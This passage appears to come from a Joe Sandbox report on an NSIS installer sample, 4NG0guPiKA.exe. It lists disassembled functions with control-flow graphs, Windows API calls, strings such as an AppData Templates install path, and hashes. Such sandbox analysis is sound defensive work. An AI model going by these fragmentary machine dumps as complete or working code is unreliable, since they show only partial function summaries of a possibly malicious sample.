                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\Desktop$C:\Users\user\Desktop\4NG0guPiKA.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                            • API String ID: 4107622049-1967632260
                                                                                                            • Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                            • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                            • Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                            • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                                                            Function 00404B10 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 116 404b10-404b5c GetDlgItem * 2 117 404b62-404bf6 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 116->117 118 404d7d-404d84 116->118 119 404c05-404c0c DeleteObject 117->119 120 404bf8-404c03 SendMessageW 117->120 121 404d86-404d96 118->121 122 404d98 118->122 124 404c0e-404c16 119->124 120->119 123 404d9b-404da4 121->123 122->123 125 404da6-404da9 123->125 126 404daf-404db5 123->126 127 404c18-404c1b 124->127 128 404c3f-404c43 124->128 125->126 130 404e93-404e9a 125->130 133 404dc4-404dcb 126->133 134 404db7-404dbe 126->134 131 404c20-404c3d call 405f0c SendMessageW * 2 127->131 132 404c1d 127->132 128->124 129 404c45-404c71 call 40412f * 2 128->129 172 404c77-404c7d 129->172 173 404d3c-404d4f GetWindowLongW SetWindowLongW 129->173 138 404f0b-404f13 130->138 139 404e9c-404ea2 130->139 131->128 132->131 135 404e40-404e43 133->135 136 404dcd-404dd0 133->136 134->130 134->133 135->130 149 404e45-404e4f 135->149 144 404dd2-404dd9 136->144 145 404ddb-404df0 call 404a5e 136->145 141 404f15-404f1b SendMessageW 138->141 142 404f1d-404f24 138->142 147 4050f3-405105 call 404196 139->147 148 404ea8-404eb2 139->148 141->142 152 404f26-404f2d 142->152 153 404f58-404f5f 142->153 144->135 144->145 145->135 171 404df2-404e03 145->171 148->147 156 404eb8-404ec7 SendMessageW 148->156 150 404e51-404e5d SendMessageW 149->150 151 404e5f-404e69 149->151 150->151 151->130 159 404e6b-404e75 151->159 160 404f36-404f3d 152->160 161 404f2f-404f30 ImageList_Destroy 152->161 164 4050b5-4050bc 153->164 165 404f65-404f71 call 4011ef 153->165 156->147 166 404ecd-404ede SendMessageW 156->166 167 404e86-404e90 159->167 168 404e77-404e84 159->168 169 404f46-404f52 160->169 170 404f3f-404f40 GlobalFree 160->170 161->160 164->147 177 4050be-4050c5 164->177 190 404f81-404f84 165->190 191 404f73-404f76 165->191 175 404ee0-404ee6 166->175 176 404ee8-404eea 166->176 167->130 168->130 169->153 170->169 171->135 179 404e05-404e07 171->179 180 404c80-404c87 172->180 178 404d55-404d59 173->178 175->176 182 404eeb-404f04 call 401299 SendMessageW 175->182 176->182 177->147 183 4050c7-4050f1 ShowWindow GetDlgItem ShowWindow 177->183 184 404d73-404d7b call 404164 178->184 185 404d5b-404d6e ShowWindow call 404164 178->185 186 404e09-404e10 179->186 187 404e1a 179->187 188 404d1d-404d30 180->188 189 404c8d-404cb5 180->189 182->138 183->147 184->118 185->147 197 404e12-404e14 186->197 198 404e16-404e18 186->198 201 404e1d-404e39 call 40117d 187->201 188->180 205 404d36-404d3a 188->205 199 404cb7-404ced SendMessageW 189->199 200 404cef-404cf1 189->200 193 404fc5-404fe9 call 4011ef 190->193 194 404f86-404f9f call 4012e2 call 401299 190->194 202 404f78 191->202 203 404f79-404f7c call 404ade 191->203 218 40508b-40509f InvalidateRect 193->218 219 404fef 193->219 224 404fa1-404fa7 194->224 225 404faf-404fbe SendMessageW 194->225 197->201 198->201 199->188 206 404cf3-404d02 SendMessageW 200->206 207 404d04-404d1a SendMessageW 200->207 201->135 202->203 203->190 205->173 205->178 206->188 207->188 218->164 221 4050a1-4050b0 call 404a31 call 404978 218->221 222 404ff2-404ffd 219->222 221->164 226 405073-405085 222->226 227 404fff-40500e 222->227 228 404fa9 224->228 229 404faa-404fad 224->229 225->193 226->218 226->222 231 405010-40501d 227->231 232 405021-405024 227->232 228->229 229->224 229->225 231->232 233 405026-405029 232->233 234 40502b-405034 232->234 236 405039-405071 SendMessageW * 2 233->236 234->236 237 405036 234->237 236->226 237->236
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                            • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                            • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                            • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                            • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                            • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                                                            Function 00405F0C Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207stringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 483 405f0c-405f17 484 405f19-405f28 483->484 485 405f2a-405f40 483->485 484->485 486 405f46-405f53 485->486 487 406158-40615e 485->487 486->487 488 405f59-405f60 486->488 489 406164-40616f 487->489 490 405f65-405f72 487->490 488->487 492 406171-406175 call 405eea 489->492 493 40617a-40617b 489->493 490->489 491 405f78-405f84 490->491 494 406145 491->494 495 405f8a-405fc6 491->495 492->493 497 406153-406156 494->497 498 406147-406151 494->498 499 4060e6-4060ea 495->499 500 405fcc-405fd7 GetVersion 495->500 497->487 498->487 503 4060ec-4060f0 499->503 504 40611f-406123 499->504 501 405ff1 500->501 502 405fd9-405fdd 500->502 505 405ff8-405fff 501->505 502->501 508 405fdf-405fe3 502->508 509 406100-40610d call 405eea 503->509 510 4060f2-4060fe call 405e31 503->510 506 406132-406143 lstrlenW 504->506 507 406125-40612d call 405f0c 504->507 511 406001-406003 505->511 512 406004-406006 505->512 506->487 507->506 508->501 515 405fe5-405fe9 508->515 520 406112-40611b 509->520 510->520 511->512 518 406042-406045 512->518 519 406008-40602e call 405db7 512->519 515->501 521 405feb-405fef 515->521 524 406055-406058 518->524 525 406047-406053 GetSystemDirectoryW 518->525 531 406034-40603d call 405f0c 519->531 532 4060cd-4060d1 519->532 520->506 523 40611d 520->523 521->505 527 4060de-4060e4 call 40617e 523->527 529 4060c3-4060c5 524->529 530 40605a-406068 GetWindowsDirectoryW 524->530 528 4060c7-4060cb 525->528 527->506 528->527 528->532 529->528 533 40606a-406074 529->533 530->529 531->528 532->527 536 4060d3-4060d9 lstrcatW 532->536 538 406076-406079 533->538 539 40608e-4060a4 SHGetSpecialFolderLocation 533->539 536->527 538->539 543 40607b-406082 538->543 540 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 539->540 541 4060bf 539->541 540->528 540->541 541->529 544 40608a-40608c 543->544 544->528 544->539
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                            • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 900638850-1230650788
                                                                                                            • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                            • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                            • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                            • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                                                            Function 00405772 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 545 405772-405798 call 405a3d 548 4057b1-4057b8 545->548 549 40579a-4057ac DeleteFileW 545->549 551 4057ba-4057bc 548->551 552 4057cb-4057db call 405eea 548->552 550 40592e-405932 549->550 553 4057c2-4057c5 551->553 554 4058dc-4058e1 551->554 558 4057ea-4057eb call 405981 552->558 559 4057dd-4057e8 lstrcatW 552->559 553->552 553->554 554->550 557 4058e3-4058e6 554->557 560 4058f0-4058f8 call 40622d 557->560 561 4058e8-4058ee 557->561 563 4057f0-4057f4 558->563 559->563 560->550 569 4058fa-40590e call 405935 call 40572a 560->569 561->550 566 405800-405806 lstrcatW 563->566 567 4057f6-4057fe 563->567 568 40580b-405827 lstrlenW FindFirstFileW 566->568 567->566 567->568 570 4058d1-4058d5 568->570 571 40582d-405835 568->571 585 405910-405913 569->585 586 405926-405929 call 405194 569->586 570->554 576 4058d7 570->576 573 405855-405869 call 405eea 571->573 574 405837-40583f 571->574 587 405880-40588b call 40572a 573->587 588 40586b-405873 573->588 577 405841-405849 574->577 578 4058b4-4058c4 FindNextFileW 574->578 576->554 577->573 581 40584b-405853 577->581 578->571 584 4058ca-4058cb FindClose 578->584 581->573 581->578 584->570 585->561 589 405915-405924 call 405194 call 405d84 585->589 586->550 598 4058ac-4058af call 405194 587->598 599 40588d-405890 587->599 588->578 590 405875-40587e call 405772 588->590 589->550 590->578 598->578 600 405892-4058a2 call 405194 call 405d84 599->600 601 4058a4-4058aa 599->601 600->578 601->578
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 0040579B
                                                                                                            • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 004057E3
                                                                                                            • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 00405806
                                                                                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 0040580C
                                                                                                            • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 0040581C
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                            • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                            Strings
                                                                                                            • "C:\Users\user\Desktop\4NG0guPiKA.exe", xrefs: 0040577B
                                                                                                            • \*.*, xrefs: 004057DD
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-3920782197
                                                                                                            • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                            • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                            • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                            • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                            Function 0040653F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                            • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                            • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                            • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                            Function 0040622D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,774D2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00406238
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: WB
                                                                                                            • API String ID: 2295610775-2854515933
                                                                                                            • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                            • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                            • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                            • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                            Function 00406254 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                            • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 310444273-0
                                                                                                            • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                            • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                                            • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                            • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9
                                                                                                            Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet, xrefs: 004020FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
